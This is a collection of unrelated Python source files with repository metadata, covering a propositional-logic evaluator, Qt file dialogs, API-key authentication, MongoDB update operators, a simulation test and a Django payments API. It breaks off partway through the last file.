TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. 
""" if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.Variable): return interp[op] if isinstance(op, pcaprop.UnaryOp): return op.__class__(_get_interp(op.prop, interp)) if isinstance(op, pcaprop.BinaryOp): prop_l = _get_interp(op.prop_l, interp) prop_r = _get_interp(op.prop_r, interp) return op.__class__(prop_l, prop_r) prop_vars = self.unique_vars() len_prop_vars = len(prop_vars) if len_prop_vars < 1: # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. return # List of tuples for all possible interpretations for given number of variables combinations = product([pcaprop.FalseProp(), pcaprop.TrueProp()], repeat=len_prop_vars) for combination in combinations: # Create a dictionary mapping the variables to the current interpretation values. interp = dict(zip(prop_vars, combination)) # Replace the variables in the proposition with the current interpretation mapping. interp_prop = _get_interp(self._parsed, interp) interp_values = list(interp.values()) # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. interp_values.append(self.eval_prop(interp_prop)) yield interp_values def satisfiable(self): """ Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if i[-1]: return pcaprop.TrueProp() return pcaprop.FalseProp() def tautology(self): """ Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if not i[-1]: return pcaprop.FalseProp() return pcaprop.TrueProp() def contradiction(self): """ Check if self is a contradiction by returning the opposite of satisfiable. 
:return: bool (Class) """ return pcaprop.FalseProp() if self.satisfiable() else pcaprop.TrueProp() @staticmethod def eval_prop(op): """ Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class) """ def _eval_prop(op): if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.NegationOp): return op.__class__(_eval_prop(op.prop)).eval() if isinstance(op, (pcaprop.DisjunctionOp, pcaprop.ConjunctionOp, pcaprop.ImplicationOp, pcaprop.EquivalenceOp)): prop_l = _eval_prop(op.prop_l) prop_r = _eval_prop(op.prop_r) return op.__class__(prop_l, prop_r).eval() return _eval_prop(op)
en
0.732378
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool :return: Sorted list of all unique variables. Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. # List of tuples for all possible interpretations for given number of variables # Create a dictionary mapping the variables to the current interpretation values. # Replace the variables in the proposition with the current interpretation mapping. # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) Check if self is a contradiction by returning the opposite of satisfiable. :return: bool (Class) Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class)
2.452456
2
src/python/director/actionhandlers.py
ori-drs/director
18
6629034
import os from PythonQt import QtCore, QtGui import director.applogic as app import director.objectmodel as om import director.ioutils as io import director.visualization as vis from director import roboturdf from director import otdfmodel _lastDir = None def getDefaultDirectory(): return _lastDir or os.getcwd() def storeDefaultDirectory(filename): global _lastDir if os.path.isfile(filename): filename = os.path.dirname(filename) if os.path.isdir(filename): _lastDir = filename def onFileOpenDialog(): mainWindow = app.getMainWindow() fileFilters = "Data Files (*.obj *.pcd *.ply *.stl *.vtk *.vtp *.wrl *.urdf *.otdf)" filename = QtGui.QFileDialog.getOpenFileName( mainWindow, "Open...", getDefaultDirectory(), fileFilters ) if not filename: return storeDefaultDirectory(filename) onOpenFile(filename) def onOpenFile(filename): if filename.lower().endswith("urdf"): onOpenUrdf(filename) elif filename.lower().endswith("otdf"): onOpenOtdf(filename) else: onOpenGeometry(filename) def onOpenGeometry(filename): if filename.lower().endswith("wrl"): onOpenVrml(filename) return polyData = io.readPolyData(filename) if not polyData or not polyData.GetNumberOfPoints(): app.showErrorMessage( "Failed to read any data from file: %s" % filename, title="Reader error" ) return vis.showPolyData(polyData, os.path.basename(filename), parent="files") def onOpenVrml(filename): meshes, color = io.readVrml(filename) folder = om.getOrCreateContainer( os.path.basename(filename), parentObj=om.getOrCreateContainer("files") ) for i, pair in enumerate(zip(meshes, color)): mesh, color = pair vis.showPolyData(mesh, "mesh %d" % i, color=color, parent=folder) def onOpenUrdf(filename): model = roboturdf.openUrdf(filename, app.getCurrentRenderView()) if not model: app.showErrorMessage( "Failed to read urdf file: %s" % filename, title="Read urdf error" ) def onOpenOtdf(filename): model = otdfmodel.openOtdf(filename, app.getCurrentRenderView()) def onFileExportUrdf(): obj = om.getActiveObject() if not obj or 
not isinstance(obj, otdfmodel.OtdfModelItem): app.showErrorMessage( "Please select an OTDF object", title="OTDF object not selected" ) return mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "URDF (*.urdf)", "URDF (*.urdf)", ) if not os.path.splitext(filename)[1]: filename += ".urdf" storeDefaultDirectory(filename) urdfString = obj.parser.getUrdfFromOtdf() urdfFile = open(filename, "w") urdfFile.write(urdfString) urdfFile.close() def onFileSaveData(): obj = om.getActiveObject() if not obj: app.showErrorMessage("Please select an object", title="No object selected") return if isinstance(obj, otdfmodel.OtdfModelItem): mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "OTDF (*.otdf)", "OTDF (*.otdf)", ) if not os.path.splitext(filename)[1]: filename += ".otdf" storeDefaultDirectory(filename) otdfString = obj.parser.getUpdatedOtdf() otdfFile = open(filename, "w") otdfFile.write(otdfString) otdfFile.close() elif hasattr(obj, "polyData"): mainWindow = app.getMainWindow() fileFilters = "PLY (*.ply);;STL (*.stl);;VTP (*.vtp);;VTK (*.vtk)" defaultFilter = "VTP (*.vtp)" filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), fileFilters, defaultFilter, ) if not filename: return if not os.path.splitext(filename)[1]: filename += ".vtp" polyData = io.writePolyData(obj.polyData, filename) else: app.showErrorMessage( "Please select an object that contains geometry data or an OTDF object", title="Invalid object selected", ) return storeDefaultDirectory(filename) def onOpenOnlineHelp(): QtGui.QDesktopServices.openUrl( QtCore.QUrl("https://openhumanoids.github.io/director/") ) def init(): mainWindow = app.getMainWindow() mainWindow.connect("fileOpen()", onFileOpenDialog) mainWindow.connect("fileSaveData()", onFileSaveData) mainWindow.connect("fileExportUrdf()", onFileExportUrdf) 
mainWindow.connect("openOnlineHelp()", onOpenOnlineHelp)
import os from PythonQt import QtCore, QtGui import director.applogic as app import director.objectmodel as om import director.ioutils as io import director.visualization as vis from director import roboturdf from director import otdfmodel _lastDir = None def getDefaultDirectory(): return _lastDir or os.getcwd() def storeDefaultDirectory(filename): global _lastDir if os.path.isfile(filename): filename = os.path.dirname(filename) if os.path.isdir(filename): _lastDir = filename def onFileOpenDialog(): mainWindow = app.getMainWindow() fileFilters = "Data Files (*.obj *.pcd *.ply *.stl *.vtk *.vtp *.wrl *.urdf *.otdf)" filename = QtGui.QFileDialog.getOpenFileName( mainWindow, "Open...", getDefaultDirectory(), fileFilters ) if not filename: return storeDefaultDirectory(filename) onOpenFile(filename) def onOpenFile(filename): if filename.lower().endswith("urdf"): onOpenUrdf(filename) elif filename.lower().endswith("otdf"): onOpenOtdf(filename) else: onOpenGeometry(filename) def onOpenGeometry(filename): if filename.lower().endswith("wrl"): onOpenVrml(filename) return polyData = io.readPolyData(filename) if not polyData or not polyData.GetNumberOfPoints(): app.showErrorMessage( "Failed to read any data from file: %s" % filename, title="Reader error" ) return vis.showPolyData(polyData, os.path.basename(filename), parent="files") def onOpenVrml(filename): meshes, color = io.readVrml(filename) folder = om.getOrCreateContainer( os.path.basename(filename), parentObj=om.getOrCreateContainer("files") ) for i, pair in enumerate(zip(meshes, color)): mesh, color = pair vis.showPolyData(mesh, "mesh %d" % i, color=color, parent=folder) def onOpenUrdf(filename): model = roboturdf.openUrdf(filename, app.getCurrentRenderView()) if not model: app.showErrorMessage( "Failed to read urdf file: %s" % filename, title="Read urdf error" ) def onOpenOtdf(filename): model = otdfmodel.openOtdf(filename, app.getCurrentRenderView()) def onFileExportUrdf(): obj = om.getActiveObject() if not obj or 
not isinstance(obj, otdfmodel.OtdfModelItem): app.showErrorMessage( "Please select an OTDF object", title="OTDF object not selected" ) return mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "URDF (*.urdf)", "URDF (*.urdf)", ) if not os.path.splitext(filename)[1]: filename += ".urdf" storeDefaultDirectory(filename) urdfString = obj.parser.getUrdfFromOtdf() urdfFile = open(filename, "w") urdfFile.write(urdfString) urdfFile.close() def onFileSaveData(): obj = om.getActiveObject() if not obj: app.showErrorMessage("Please select an object", title="No object selected") return if isinstance(obj, otdfmodel.OtdfModelItem): mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "OTDF (*.otdf)", "OTDF (*.otdf)", ) if not os.path.splitext(filename)[1]: filename += ".otdf" storeDefaultDirectory(filename) otdfString = obj.parser.getUpdatedOtdf() otdfFile = open(filename, "w") otdfFile.write(otdfString) otdfFile.close() elif hasattr(obj, "polyData"): mainWindow = app.getMainWindow() fileFilters = "PLY (*.ply);;STL (*.stl);;VTP (*.vtp);;VTK (*.vtk)" defaultFilter = "VTP (*.vtp)" filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), fileFilters, defaultFilter, ) if not filename: return if not os.path.splitext(filename)[1]: filename += ".vtp" polyData = io.writePolyData(obj.polyData, filename) else: app.showErrorMessage( "Please select an object that contains geometry data or an OTDF object", title="Invalid object selected", ) return storeDefaultDirectory(filename) def onOpenOnlineHelp(): QtGui.QDesktopServices.openUrl( QtCore.QUrl("https://openhumanoids.github.io/director/") ) def init(): mainWindow = app.getMainWindow() mainWindow.connect("fileOpen()", onFileOpenDialog) mainWindow.connect("fileSaveData()", onFileSaveData) mainWindow.connect("fileExportUrdf()", onFileExportUrdf) 
mainWindow.connect("openOnlineHelp()", onOpenOnlineHelp)
none
1
2.253147
2
src/logging/02_final_logging_data_auto_service/restful_auto_service/infrastructure/auth.py
turing4ever/restful-services-in-pyramid
58
6629035
<reponame>turing4ever/restful-services-in-pyramid<gh_stars>10-100 from pyramid.response import Response from restful_auto_service.data.repository import Repository def parse_api_key(request): auth_header = request.headers.get('Authorization') if not auth_header: return None, "You must specify an Authorization header." parts = auth_header.split(':') if len(parts) != 2 or parts[0].strip() != 'api-key': return None, "Invalid auth header" api_key = parts[1].strip() user = Repository.find_user_by_api_key(api_key) if not user: return None, "Invalid API Key, no user with this account." return user, None def require_api_auth(func): def wrapped(request): user, error = parse_api_key(request) if error: return Response(status=403, body=error) request.api_user = user return func(request) return wrapped
from pyramid.response import Response from restful_auto_service.data.repository import Repository def parse_api_key(request): auth_header = request.headers.get('Authorization') if not auth_header: return None, "You must specify an Authorization header." parts = auth_header.split(':') if len(parts) != 2 or parts[0].strip() != 'api-key': return None, "Invalid auth header" api_key = parts[1].strip() user = Repository.find_user_by_api_key(api_key) if not user: return None, "Invalid API Key, no user with this account." return user, None def require_api_auth(func): def wrapped(request): user, error = parse_api_key(request) if error: return Response(status=403, body=error) request.api_user = user return func(request) return wrapped
none
1
2.814682
3
motorturbine/updateset.py
BFriedrichs/motorturbine
1
6629036
<filename>motorturbine/updateset.py def to_operator(current, new_value): is_operator = isinstance(new_value, UpdateOperator) is_set = isinstance(new_value, Set) if is_operator: if not is_set and current is None: raise Exception('Cant use operator on None') else: new_value = Set(new_value) return new_value class UpdateOperator(object): """UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. """ def __init__(self, update): super().__init__() self.update = update def set_original_value(self, value): self.original_value = value class Set(UpdateOperator): """Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} """ def __call__(self): return '$set', self.update def apply(self): return self.update class Unset(UpdateOperator): """Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} """ def __call__(self): return '$unset', self.update def apply(self): return self.update class Inc(UpdateOperator): """Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} """ def __call__(self): return '$inc', self.update def apply(self): return self.original_value + self.update class Dec(UpdateOperator): """Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} """ def __call__(self): return '$inc', -self.update def apply(self): return self.original_value - self.update class Max(UpdateOperator): """Update the field to the maximum of database and current value. 
Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} """ def __call__(self): return '$max', self.update def apply(self): return max(self.original_value, self.update) class Min(UpdateOperator): """Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} """ def __call__(self): return '$min', self.update def apply(self): return min(self.original_value, self.update) class Mul(UpdateOperator): """Is used to multipy a numeric value by a given amount. Example usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} """ def __call__(self): return '$mul', self.update def apply(self): return self.original_value * self.update class Push(UpdateOperator): """Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} """ def __call__(self): return '$push', self.update def apply(self): return self.original_value.append(self.update) class Pull(UpdateOperator): """Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} """ def __call__(self): return '$pull', self.update def apply(self): return [ val for val in self.original_value if val != self.update ] class PullAll(UpdateOperator): """Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]} """ def __call__(self): return '$pullAll', self.update def apply(self): return [ val for val in self.original_value if val not in self.update ]
<filename>motorturbine/updateset.py def to_operator(current, new_value): is_operator = isinstance(new_value, UpdateOperator) is_set = isinstance(new_value, Set) if is_operator: if not is_set and current is None: raise Exception('Cant use operator on None') else: new_value = Set(new_value) return new_value class UpdateOperator(object): """UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. """ def __init__(self, update): super().__init__() self.update = update def set_original_value(self, value): self.original_value = value class Set(UpdateOperator): """Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} """ def __call__(self): return '$set', self.update def apply(self): return self.update class Unset(UpdateOperator): """Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} """ def __call__(self): return '$unset', self.update def apply(self): return self.update class Inc(UpdateOperator): """Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} """ def __call__(self): return '$inc', self.update def apply(self): return self.original_value + self.update class Dec(UpdateOperator): """Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} """ def __call__(self): return '$inc', -self.update def apply(self): return self.original_value - self.update class Max(UpdateOperator): """Update the field to the maximum of database and current value. 
Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} """ def __call__(self): return '$max', self.update def apply(self): return max(self.original_value, self.update) class Min(UpdateOperator): """Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} """ def __call__(self): return '$min', self.update def apply(self): return min(self.original_value, self.update) class Mul(UpdateOperator): """Is used to multipy a numeric value by a given amount. Example usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} """ def __call__(self): return '$mul', self.update def apply(self): return self.original_value * self.update class Push(UpdateOperator): """Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} """ def __call__(self): return '$push', self.update def apply(self): return self.original_value.append(self.update) class Pull(UpdateOperator): """Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} """ def __call__(self): return '$pull', self.update def apply(self): return [ val for val in self.original_value if val != self.update ] class PullAll(UpdateOperator): """Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]} """ def __call__(self): return '$pullAll', self.update def apply(self): return [ val for val in self.original_value if val not in self.update ]
en
0.629647
UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} Update the field to the maximum of database and current value. Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} Is used to multipy a numeric value by a given amount. Example usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]}
3.702328
4
layers/drawing.py
MEDVEDx64/Graphone
0
6629037
<filename>layers/drawing.py from . import base from . import interactive from pygame import gfxdraw, display from utils.data import DataContainer class Drawing(list, DataContainer): def __init__(self): super(Drawing, self).__init__() self.color = (255, 255, 255) def prefix(self): return 'drawing' class ShapeLayer(base.InteractiveLayer): def __init__(self, app, parent=None): super(ShapeLayer, self).__init__(app) self.parent = parent class LineShapeLayer(ShapeLayer, interactive.DraggableVertexLayer): def __init__(self, app, parent=None): super(LineShapeLayer, self).__init__(app, parent) def render(self): super(LineShapeLayer, self).render() screen = display.get_surface() color = (255, 255, 255) if self.parent: color = self.parent.color gfxdraw.line(screen, self.x + self.app.context.offset_x, self.y + self.app.context.offset_y, self.x2 + self.app.context.offset_x, self.y2 + self.app.context.offset_y, color)
<filename>layers/drawing.py from . import base from . import interactive from pygame import gfxdraw, display from utils.data import DataContainer class Drawing(list, DataContainer): def __init__(self): super(Drawing, self).__init__() self.color = (255, 255, 255) def prefix(self): return 'drawing' class ShapeLayer(base.InteractiveLayer): def __init__(self, app, parent=None): super(ShapeLayer, self).__init__(app) self.parent = parent class LineShapeLayer(ShapeLayer, interactive.DraggableVertexLayer): def __init__(self, app, parent=None): super(LineShapeLayer, self).__init__(app, parent) def render(self): super(LineShapeLayer, self).render() screen = display.get_surface() color = (255, 255, 255) if self.parent: color = self.parent.color gfxdraw.line(screen, self.x + self.app.context.offset_x, self.y + self.app.context.offset_y, self.x2 + self.app.context.offset_x, self.y2 + self.app.context.offset_y, color)
none
1
2.782963
3
tests/pymcell4_positive/1515_tetrahedron_box_collision_moving_3_w_wall_wall_hit/model.py
mcellteam/mcell-tests
1
6629038
#!/usr/bin/env python3 import sys import os import copy import numpy as np MCELL_PATH = os.environ.get('MCELL_PATH', '') if MCELL_PATH: sys.path.append(os.path.join(MCELL_PATH, 'lib')) else: print("Error: variable MCELL_PATH that is used to find the mcell library was not set.") sys.exit(1) import mcell as m ITERATIONS = 10 from geometry import * from observables import * model = m.Model() model.add_observables(observables) # TODO viz in cellblender without any molecules does not work yet a = m.Species( name = 'a', diffusion_constant_3d = 0 ) model.add_species(a) rel = m.ReleaseSite( name = 'rel', complex = a, shape = m.Shape.SPHERICAL, location = (0, 0, 0), site_diameter = 0, number_to_release = 1 ) model.add_release_site(rel) Tetrahedron.translate((-0.2, 0, 0)) model.add_geometry_object(Tetrahedron) Box = m.geometry_utils.create_box( 'Box', 0.2 ) model.add_geometry_object(Box) model.config.total_iterations = ITERATIONS model.initialize() def print_wall_hit_info(wall_wall_hits): for info in wall_wall_hits: print(info.wall1.geometry_object.name + ":" + str(info.wall1.wall_index) + " - " + info.wall2.geometry_object.name + ":" + str(info.wall2.wall_index)) for i in range(ITERATIONS + 1): model.export_viz_data_model() for k in range(len(Tetrahedron_vertex_list) - 1): # not moving with the last vertex model.add_vertex_move(Tetrahedron, k, (0.02, 0, 0)) wall_wall_hits = model.apply_vertex_moves(collect_wall_wall_hits=True, randomize_order=False) print_wall_hit_info(wall_wall_hits) if i == 3: assert len(wall_wall_hits) == 3 # checking depends on Tetrahedron having internal object id 0 and Box id 1 assert wall_wall_hits[2].wall1.geometry_object is Tetrahedron assert wall_wall_hits[2].wall1.wall_index == 3 assert wall_wall_hits[2].wall2.geometry_object == Box assert wall_wall_hits[2].wall2.wall_index == 0 model.run_iterations(1) model.end_simulation()
#!/usr/bin/env python3 import sys import os import copy import numpy as np MCELL_PATH = os.environ.get('MCELL_PATH', '') if MCELL_PATH: sys.path.append(os.path.join(MCELL_PATH, 'lib')) else: print("Error: variable MCELL_PATH that is used to find the mcell library was not set.") sys.exit(1) import mcell as m ITERATIONS = 10 from geometry import * from observables import * model = m.Model() model.add_observables(observables) # TODO viz in cellblender without any molecules does not work yet a = m.Species( name = 'a', diffusion_constant_3d = 0 ) model.add_species(a) rel = m.ReleaseSite( name = 'rel', complex = a, shape = m.Shape.SPHERICAL, location = (0, 0, 0), site_diameter = 0, number_to_release = 1 ) model.add_release_site(rel) Tetrahedron.translate((-0.2, 0, 0)) model.add_geometry_object(Tetrahedron) Box = m.geometry_utils.create_box( 'Box', 0.2 ) model.add_geometry_object(Box) model.config.total_iterations = ITERATIONS model.initialize() def print_wall_hit_info(wall_wall_hits): for info in wall_wall_hits: print(info.wall1.geometry_object.name + ":" + str(info.wall1.wall_index) + " - " + info.wall2.geometry_object.name + ":" + str(info.wall2.wall_index)) for i in range(ITERATIONS + 1): model.export_viz_data_model() for k in range(len(Tetrahedron_vertex_list) - 1): # not moving with the last vertex model.add_vertex_move(Tetrahedron, k, (0.02, 0, 0)) wall_wall_hits = model.apply_vertex_moves(collect_wall_wall_hits=True, randomize_order=False) print_wall_hit_info(wall_wall_hits) if i == 3: assert len(wall_wall_hits) == 3 # checking depends on Tetrahedron having internal object id 0 and Box id 1 assert wall_wall_hits[2].wall1.geometry_object is Tetrahedron assert wall_wall_hits[2].wall1.wall_index == 3 assert wall_wall_hits[2].wall2.geometry_object == Box assert wall_wall_hits[2].wall2.wall_index == 0 model.run_iterations(1) model.end_simulation()
en
0.782162
#!/usr/bin/env python3 # TODO viz in cellblender without any molecules does not work yet # not moving with the last vertex # checking depends on Tetrahedron having internal object id 0 and Box id 1
1.968094
2
seahub/options/views.py
saukrIppl/newsea
2
6629039
<gh_stars>1-10 # -*- coding: utf-8 -*- from django.http import HttpResponse, HttpResponseBadRequest, \ HttpResponseRedirect , Http404 from django.views.decorators.http import require_POST from django.contrib import messages from django.utils.translation import ugettext as _ from seahub.auth.decorators import login_required from seahub.options.models import UserOptions from seahub.utils import is_pro_version from seahub.settings import SITE_ROOT @login_required @require_POST def save_options(request): """ """ username = request.user.username repo_enc = request.POST.get('repo-enc', '') server_crypto = True if repo_enc.startswith('server') else False if server_crypto: UserOptions.objects.enable_server_crypto(username) else: UserOptions.objects.disable_server_crypto(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next) @login_required @require_POST def sub_lib_enable_set(request): """ """ if is_pro_version(): raise Http404 username = request.user.username enable_sub_lib = request.POST.get('enable-sub-lib', '') if enable_sub_lib: UserOptions.objects.enable_sub_lib(username) else: UserOptions.objects.disable_sub_lib(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next)
# -*- coding: utf-8 -*- from django.http import HttpResponse, HttpResponseBadRequest, \ HttpResponseRedirect , Http404 from django.views.decorators.http import require_POST from django.contrib import messages from django.utils.translation import ugettext as _ from seahub.auth.decorators import login_required from seahub.options.models import UserOptions from seahub.utils import is_pro_version from seahub.settings import SITE_ROOT @login_required @require_POST def save_options(request): """ """ username = request.user.username repo_enc = request.POST.get('repo-enc', '') server_crypto = True if repo_enc.startswith('server') else False if server_crypto: UserOptions.objects.enable_server_crypto(username) else: UserOptions.objects.disable_server_crypto(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next) @login_required @require_POST def sub_lib_enable_set(request): """ """ if is_pro_version(): raise Http404 username = request.user.username enable_sub_lib = request.POST.get('enable-sub-lib', '') if enable_sub_lib: UserOptions.objects.enable_sub_lib(username) else: UserOptions.objects.disable_sub_lib(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next)
en
0.769321
# -*- coding: utf-8 -*-
2.004739
2
demo/person/project/infrastructure/drivers/elasticsearch/connector.py
giovannifarlley/ms--fastapi-template
24
6629040
<gh_stars>10-100 from elasticsearch import Elasticsearch from project.infrastructure.environments.loader import Configs from project.infrastructure.monitoring_layer.aplication_general_log import Log from project.infrastructure.monitoring_layer.aplication_kpi import Monitor import sys log = Log() class Elk(object): def __init__(self) -> None: """ Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. """ self.elasticsearch_config = Configs.get_by_key("elk") def client(self) -> Elasticsearch: """ Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch """ try: hosts = self.elasticsearch_config["hosts"] username = self.elasticsearch_config["username"] password = <PASSWORD>["password"] client = Elasticsearch( hosts=hosts, http_auth=(username, password) ) return client except Exception as error: log.record.error( "ELK connection error, check your server and credentials", exc_info=sys.exc_info() ) Monitor.send_kpi_message("elk client error") raise error
from elasticsearch import Elasticsearch from project.infrastructure.environments.loader import Configs from project.infrastructure.monitoring_layer.aplication_general_log import Log from project.infrastructure.monitoring_layer.aplication_kpi import Monitor import sys log = Log() class Elk(object): def __init__(self) -> None: """ Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. """ self.elasticsearch_config = Configs.get_by_key("elk") def client(self) -> Elasticsearch: """ Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch """ try: hosts = self.elasticsearch_config["hosts"] username = self.elasticsearch_config["username"] password = <PASSWORD>["password"] client = Elasticsearch( hosts=hosts, http_auth=(username, password) ) return client except Exception as error: log.record.error( "ELK connection error, check your server and credentials", exc_info=sys.exc_info() ) Monitor.send_kpi_message("elk client error") raise error
pt
0.980697
Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch
2.561241
3
ledger/payments/api.py
jawaidm/ledger
1
6629041
import json from django.db import transaction from django.conf import settings from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import get_template from django.core.exceptions import ValidationError from django.core.urlresolvers import reverse from wsgiref.util import FileWrapper from rest_framework import viewsets, serializers, status, generics, views from rest_framework.renderers import JSONRenderer from rest_framework.response import Response from rest_framework.authentication import SessionAuthentication from rest_framework.permissions import IsAuthenticated from rest_framework.decorators import list_route,detail_route from ledger.payments.bpay.models import BpayTransaction, BpayFile, BpayCollection from ledger.payments.invoice.models import Invoice, InvoiceBPAY from ledger.payments.bpoint.models import BpointTransaction, BpointToken from ledger.payments.cash.models import CashTransaction, Region, District, DISTRICT_CHOICES, REGION_CHOICES from ledger.payments.models import TrackRefund from ledger.payments.utils import systemid_check, update_payments from ledger.payments.facade import bpoint_facade from ledger.payments.reports import generate_items_csv, generate_trans_csv, generate_items_csv_allocated from ledger.payments.emails import send_refund_email from ledger.accounts.models import EmailUser from oscar.apps.order.models import Order from oscar.apps.payment import forms from confy import env import traceback import six class CsrfExemptSessionAuthentication(SessionAuthentication): def enforce_csrf(self, request): return ####################################################### # # # BPAY # # # ####################################################### class BpayTransactionSerializer(serializers.ModelSerializer): type = serializers.SerializerMethodField() payment_instruction = serializers.SerializerMethodField() payment_method = serializers.SerializerMethodField() entry_method = serializers.SerializerMethodField() created = 
